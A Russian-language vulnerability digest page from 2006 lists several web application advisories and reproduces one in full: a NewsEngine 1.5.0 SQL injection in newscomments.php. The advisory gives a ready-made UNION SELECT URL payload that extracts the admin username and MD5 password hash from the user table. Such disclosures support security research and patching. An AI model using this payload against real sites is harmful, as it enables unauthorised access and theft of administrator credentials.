Дополнительная информация

Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

[Kil13r-SA-20060606] ESTsoft InternetDISK Arbitary Code Execution Vulnerability

[KAPDA::#47] - myNewsletter 1.1.2 SQL_Injection

Dmx Forum <= v2.1a Remote Passwords Disclosure

[MajorSecurity #8]DreamAccount <= 3.1 - Remote File Include Vulnerability

From:	ajannhwt_(at)_hotmail.com <ajannhwt_(at)_hotmail.com>
Date:	6 июня 2006 г.
Subject:	ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability

# Title  :   NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
# Author :   ajann

### Vulnerability;

$$$ http://[target]/[path]/newscomments.php

Example:

$$
http://[target]/[path]/newscomments.php?newsid='/**/union/**/select/**/0,
username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,
0/**/from/**/news1_user/**/where/**/userid=1/*

Admin MD5 HaSh